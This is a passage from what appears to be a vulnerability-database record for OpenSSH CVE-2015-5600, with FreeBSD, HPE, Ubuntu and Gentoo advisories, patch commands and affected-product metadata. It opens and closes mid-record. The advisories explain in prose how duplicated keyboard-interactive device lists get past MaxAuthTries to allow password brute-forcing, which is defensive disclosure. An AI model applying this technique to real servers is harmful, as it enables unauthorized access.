"https://www.redhat.com/security/data/cve/cve-2013-2453.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0411.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0460.html" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2473.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2454" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2437.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2444" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5905.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0424.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2412.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2398.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2450.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5898.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2457" }, { "trust": 0.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2455.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2421.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2459.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2442.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5884.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0461.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2423.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2461" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2414.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5887.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2448.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0418.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5906.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0387.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-1876.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2401.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0456.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2469.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5888.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2412" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0429.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5829" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5372" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5457" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5375" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5372.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4041" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5375.html" }, { "trust": 0.1, "url": "https://www.ibm.com/developerworks/java/jdk/alerts/" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-4041.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5457.html" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.6-1ubuntu0.10.04.4" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5851" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openjdk-6/6b27-1.12.6-1ubuntu0.12.04.4" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5803" }, { "db": "BID", "id": "63082" }, { "db": "JVNDB", "id": "JVNDB-2013-004699" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "123647" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "123942" }, { "db": "PACKETSTORM", "id": "124143" }, { "db": "NVD", "id": "CVE-2013-5803" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2013-5803" }, { "db": "BID", "id": "63082" }, { "db": "JVNDB", "id": "JVNDB-2013-004699" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "123647" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123689" }, { "db": "PACKETSTORM", "id": "123942" }, { "db": "PACKETSTORM", "id": "124143" }, { "db": "NVD", "id": "CVE-2013-5803" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-10-16T00:00:00", "db": "VULMON", "id": "CVE-2013-5803" }, { "date": "2013-10-15T00:00:00", "db": "BID", "id": "63082" }, { "date": "2013-10-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-004699" }, { "date": "2014-06-30T23:39:28", "db": "PACKETSTORM", "id": "127267" }, { "date": "2013-10-17T21:22:25", "db": "PACKETSTORM", "id": "123649" }, { "date": "2013-10-17T20:25:58", "db": "PACKETSTORM", "id": "123647" }, { "date": "2014-04-17T22:01:36", "db": "PACKETSTORM", "id": "126195" }, { "date": "2013-10-21T19:09:54", "db": "PACKETSTORM", "id": "123689" }, { "date": "2013-11-07T13:38:00", "db": "PACKETSTORM", "id": "123942" }, { "date": "2013-11-22T02:10:22", "db": "PACKETSTORM", "id": "124143" }, { "date": "2013-10-16T17:55:05.207000", "db": "NVD", "id": "CVE-2013-5803" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2013-5803" }, { "date": "2017-08-22T14:12:00", "db": "BID", "id": "63082" }, { "date": "2015-03-17T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-004699" }, { "date": "2022-05-13T14:57:18.607000", "db": "NVD", "id": "CVE-2013-5803" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "63082" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural Oracle Java In product JGSS Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-004699" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unknown", "sources": [ { "db": "BID", "id": "63082" } ], "trust": 0.3 } }
var-201508-0620
Vulnerability from variot
The kbdint_next_device function in auth2-chall.c in sshd in OpenSSH through 6.9 does not properly restrict the processing of keyboard-interactive devices within a single connection, which makes it easier for remote attackers to conduct brute-force attacks or cause a denial of service (CPU consumption) via a long and duplicative list in the ssh -oKbdInteractiveDevices option, as demonstrated by a modified client that provides a different password for each pam element on this list. Openssh of sshd of auth2-chall.c Inside kbdint_next_device The function is a keyboard interaction within a single connection (keyboard-interactive) The brute force is not adequately restricted for device processing. (brute-force) Attacks or service disruption (CPU Resource consumption ) There are vulnerabilities that are put into a state.By a third party ssh of -oKbdInteractiveDevices Brute force through an overly long and redundant list of options (brute-force) Attacks or service disruption (CPU Resource consumption ) There is a possibility of being put into a state. OpenSSH is prone to a security-bypass weakness. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. These vulnerabilities include:
The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "POODLE", which could be exploited remotely resulting in disclosure of information. The following firmware versions of Virtual Connect (VC) are impacted:
HPE BladeSystem c-Class Virtual Connect (VC) Firmware 4.30 through VC 4.45 HPE BladeSystem c-Class Virtual Connect (VC) Firmware 3.62 through VC 4.21
Note: Firmware versions 3.62 through 4.21 are not impacted by CVE-2016-0800, CVE-2015-3194, CVE-2014-3566, CVE-2015-0705, CVE-2016-0799, and CVE-2016-2842. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
============================================================================= FreeBSD-SA-15:16.openssh Security Advisory The FreeBSD Project
Topic: OpenSSH multiple vulnerabilities
Category: contrib Module: openssh Announced: 2015-07-28, revised on 2015-07-30 Affects: All supported versions of FreeBSD. Corrected: 2015-07-28 19:58:44 UTC (stable/10, 10.2-PRERELEASE) 2015-07-28 19:58:44 UTC (stable/10, 10.2-BETA2-p2) 2015-07-28 19:59:04 UTC (releng/10.2, 10.2-RC1-p1) 2015-07-28 19:59:11 UTC (releng/10.1, 10.1-RELEASE-p16) 2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE) 2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21) 2015-07-30 10:09:07 UTC (stable/8, 8.4-STABLE) 2015-07-30 10:09:31 UTC (releng/8.4, 8.4-RELEASE-p36) CVE Name: CVE-2014-2653, CVE-2015-5600
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
- Revision history
v1.0 2015-02-25 Initial release. v1.1 2015-07-30 Revised patch for FreeBSD 8.x to address regression when keyboard interactive authentication is used.
I. Background
OpenSSH is an implementation of the SSH protocol suite, providing an encrypted and authenticated transport for a variety of services, including remote shell access.
The security of the SSH connection relies on the server authenticating itself to the client as well as the user authenticating itself to the server. SSH servers uses host keys to verify their identity.
RFC 4255 has defined a method of verifying SSH host keys using Domain Name System Security (DNSSEC), by publishing the key fingerprint using DNS with "SSHFP" resource record. RFC 6187 has defined methods to use a signature by a trusted certification authority to bind a given public key to a given digital identity with X.509v3 certificates.
The PAM (Pluggable Authentication Modules) library provides a flexible framework for user authentication and session setup / teardown.
OpenSSH uses PAM for password authentication by default.
II. Problem Description
OpenSSH clients does not correctly verify DNS SSHFP records when a server offers a certificate. [CVE-2014-2653]
OpenSSH servers which are configured to allow password authentication using PAM (default) would allow many password attempts.
III. Impact
A malicious server may be able to force a connecting client to skip DNS SSHFP record check and require the user to perform manual host verification of the host key fingerprint. This could allow man-in-the-middle attack if the user does not carefully check the fingerprint. [CVE-2014-2653]
A remote attacker may effectively bypass MaxAuthTries settings, which would enable them to brute force passwords. [CVE-2015-5600]
IV. Workaround
Systems that do not use OpenSSH are not affected.
There is no workaround for CVE-2014-2653, but the problem only affects networks where DNSsec and SSHFP is properly configured. Users who uses SSH should always check server host key fingerprints carefully when prompted.
System administrators can set:
UsePAM no
In their /etc/ssh/sshd_config and restart sshd service to workaround the problem described as CVE-2015-5600 at expense of losing features provided by the PAM framework.
We recommend system administrators to disable password based authentication completely, and use key based authentication exclusively in their SSH server configuration, when possible. This would eliminate the possibility of being ever exposed to password brute force attack.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
SSH service has to be restarted after the update. A reboot is recommended but not required.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
SSH service has to be restarted after the update. A reboot is recommended but not required.
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 9.3, 10.1, 10.2]
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh.patch
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh.patch.asc
gpg --verify openssh.patch.asc
[FreeBSD 8.4]
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8.patch
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8.patch.asc
gpg --verify openssh-8.patch.asc
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8-errata.patc
fetch https://security.FreeBSD.org/patches/SA-15:16/openssh-8-errata.patch.asc
gpg --verify openssh-8-errata.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart the SSH service, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r286067 releng/8.4/ r286068 stable/9/ r285977 releng/9.3/ r285980 stable/10/ r285976 releng/10.1/ r285979 releng/10.2/ r285978
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. References
The latest revision of this advisory is available at
iQIcBAEBCgAGBQJVufuCAAoJEO1n7NZdz2rnHHAQALfjXH/WyrgpHxw1YFipwFSD bl+HLbdvMVbfBxLV7eVBK9RPQiyoxwocmU0uMdiNEIWt2llczTLEl/wtUjj6f4Ko K6E7AAOgOX4zdQxBd2502FvXC1oNbDEvK8X3M4MzPHAG4QRgXNffRGYvClmbayck 2i+bjcHdKAEwFJjHk4wXOQ0yhdF6Q36bH0N3kPV9z7sAt3tuzSWhvtX6QQSyeuCJ ie2db9CdSUnFhYELJnVMpVTf3ppMqUT6QEe45LmsGA6F8yWdMaW2vtMdJq6xFVYP INCUVyOlDRu0TibjLUpXu4KugeDgyTXy9oz4SRdnpcUWz33fM6aSgOkpiM1h05ja BJrs0HZbkjCwtD+8a0buoyIKb9NBIsDKbrec5g8AEDkAHjRzraLGAXUYwkFeyqYJ j+ll5r5iu5fc4s8QM+ySlGCW8V9Ix8FX7Rr7FhAWLSKEldDsnCRjG4EfrAcd1HiC PleAnLv4uKwfSugIBIEs5ls7+TzWytW8nnEpMEerXUD894suFIycOT6eoUYF/CCT I1nHWSITw4HSj8+wBvrhxwZCRqIMOAZB+3jzrwRE+QZkghoWnPnqrCn9uLkdndq5 ewgz6PiuYC8Zx0Z6trA72oV+XjTKu2d6eO5tRpe9aAmhPmfBWg3fXYltVzTzF9IE r0z98qmTEPiTDi8dr+K/ =GsXJ -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c05128992
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05128992 Version: 1
HPSBST03599 rev.1 - HPE 3PAR OS running OpenSSH, Remote Denial of Service (DoS), Access Restriction Bypass
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-05-11 Last Updated: 2016-05-11
Potential Security Impact: Remote Access Restriction Bypass, Denial of Service (DoS)
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY A vulnerability in OpenSSH has been addressed by HPE 3PAR OS. The vulnerabily could be exploited remotely resulting in Denial of Service (DoS) or access restriction bypass.
References:
- CVE-2015-5600
- PSRT110106
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HPE 3PAR OS versions 3.1.3 and later, prior to 3.2.1 MU5 and 3.2.2 MU2 running OpenSSH
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-5600 (AV:N/AC:L/Au:N/C:P/I:N/A:C) 8.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HPE has provided the following software updates and mitigation information to resolve the vulnerability in 3PAR OS running OpenSSH.
-
3PAR OS 3.2.1 MU5 and 3.2.2 MU2
- HPE recommends prior impacted versions update to 3PAR OS 3.2.1 MU5 or 3.2.2 MU2.
-
3PAR OS 3.1.3 is also vulnerable but will not be fixed.
Mitigation: The best protection to guard against exploitation of this vulnerability is to securely configure and operate the storage array in accordance with the HPE 3PAR Configuration Guidelines documentation. Please contact HPE Technical Support for assistance.
HISTORY Version:1 (rev.1) - 11 May 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. ============================================================================ Ubuntu Security Notice USN-2710-2 August 18, 2015
openssh regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
USN-2710-1 introduced a regression in OpenSSH. The upstream fix for CVE-2015-5600 caused a regression resulting in random authentication failures in non-default configurations. This update fixes the problem.
Original advisory details:
Moritz Jodeit discovered that OpenSSH incorrectly handled usernames when using PAM authentication. If an additional vulnerability were discovered in the OpenSSH unprivileged child process, this issue could allow a remote attacker to perform user impersonation. (CVE number pending) Moritz Jodeit discovered that OpenSSH incorrectly handled context memory when using PAM authentication. If an additional vulnerability were discovered in the OpenSSH unprivileged child process, this issue could allow a remote attacker to bypass authentication or possibly execute arbitrary code. (CVE number pending) Jann Horn discovered that OpenSSH incorrectly handled time windows for X connections. (CVE-2015-5352) It was discovered that OpenSSH incorrectly handled keyboard-interactive authentication. (CVE-2015-5600)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.04: openssh-server 1:6.7p1-5ubuntu1.3
Ubuntu 14.04 LTS: openssh-server 1:6.6p1-2ubuntu2.3
Ubuntu 12.04 LTS: openssh-server 1:5.9p1-5ubuntu1.7
In general, a standard system update will make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2710-2 http://www.ubuntu.com/usn/usn-2710-1 https://launchpad.net/bugs/1485719
Package Information: https://launchpad.net/ubuntu/+source/openssh/1:6.7p1-5ubuntu1.3 https://launchpad.net/ubuntu/+source/openssh/1:6.6p1-2ubuntu2.3 https://launchpad.net/ubuntu/+source/openssh/1:5.9p1-5ubuntu1.7 . VCX prior to 9.8.18 with OpenSSH or ISC BIND.
-
VCX 9.8.18 for the following Products/SKUs:
-
J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr
- J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr
- JC517A HP VCX V7205 Platform w/DL 360 G6 Server
- JE355A HP VCX V6000 Branch Platform 9.0
- JC516A HP VCX V7005 Platform w/DL 120 G6 Server
- JC518A HP VCX Connect 200 Primry 120 G6 Server
- J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr
- JE341A HP VCX Connect 100 Secondary
- JE252A HP VCX Connect Primary MIM Module
- JE253A HP VCX Connect Secondary MIM Module
- JE254A HP VCX Branch MIM Module
- JE355A HP VCX V6000 Branch Platform 9.0
- JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod
- JD023A HP MSR30-40 Router with VCX MIM Module
- JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM
- JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod
- JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod
- JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod
- JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS
- JE340A HP VCX Connect 100 Pri Server 9.0
- JE342A HP VCX Connect 100 Sec Server 9.0
HISTORY Version:1 (rev.1) - 28 January 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201512-04
https://security.gentoo.org/
Severity: Normal Title: OpenSSH: Multiple vulnerabilities Date: December 20, 2015 Bugs: #553724, #555518, #557340 ID: 201512-04
Synopsis
Multiple vulnerabilities have been found in OpenSSH, the worst of which could lead to arbitrary code execution, or cause a Denial of Service condition.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/openssh < 7.1_p1-r2 >= 7.1_p1-r2
Description
Multiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details.
Impact
Workaround
There is no known workaround at this time.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-6.9_p1-r2"
References
[ 1 ] CVE-2015-5352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5352 [ 2 ] CVE-2015-5600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5600 [ 3 ] CVE-2015-6563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6563 [ 4 ] CVE-2015-6564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6564 [ 5 ] CVE-2015-6565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6565
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201512-04
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201508-0620", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssh", "scope": "lte", "trust": 1.8, "vendor": "openbsd", "version": "6.9" }, { "model": "integrated lights out manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "3.2" }, { "model": "integrated lights out manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "3.1" }, { "model": "integrated lights out manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "3.0" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10 to 10.10.4" }, { "model": "big-ip", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "1500" }, { "model": "openssh", "scope": "eq", "trust": 0.6, "vendor": "openbsd", "version": "6.9" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "15.04" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.4" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.3" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "6.9p1", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.13" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.28" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.9." }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.9" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.6" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.4" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.5.1" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0.0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, 